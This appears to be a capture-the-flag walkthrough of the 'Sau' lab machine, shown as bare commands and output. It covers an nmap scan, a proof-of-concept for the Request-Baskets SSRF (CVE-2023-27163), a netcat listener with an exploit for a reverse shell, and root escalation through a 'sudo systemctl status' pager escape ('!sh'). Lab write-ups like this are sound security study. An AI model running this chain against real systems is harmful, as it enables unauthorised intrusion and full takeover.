nmap sau.htb          
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-10 13:29 CEST
Nmap scan report for sau.htb (10.10.11.224)
Host is up (0.058s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    filtered http
55555/tcp open     unknown
 
Nmap done: 1 IP address (1 host up) scanned in 7.60 seconds

sh CVE-2023-27163.sh http://10.10.11.224:55555/ http://127.0.0.1:80/
Proof-of-Concept of SSRF on Request-Baskets (CVE-2023-27163) || More info at https://github.com/entr0pie/CVE-2023-27163  
  
> Creating the "****" proxy basket...  
> Basket created!  
> Accessing http://10.10.11.224:55555/**** now makes the server request to http://127.0.0.1:80/.  
> Authorization: x*****

nc -lvp 4444
Listening on 0.0.0.0 YOUR_PORT

python3 exploit.py YOUR_IP YOUR_PORT http://10.10.11.224:55555//*****//login  
Running exploit on http://10.10.11.224:55555/*****/login

cd /home/puma
cat user.txt
9********b

puma@sau:~$ sudo -l  
Matching Defaults entries for puma on sau:  
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
  
User puma may run the following commands on sau:  
ALL : ALL) NOPASSWD: /usr/bin/systemctl status trail.service

sudo systemctl status example.service

!sh

cd /root
cat root.txt
1********0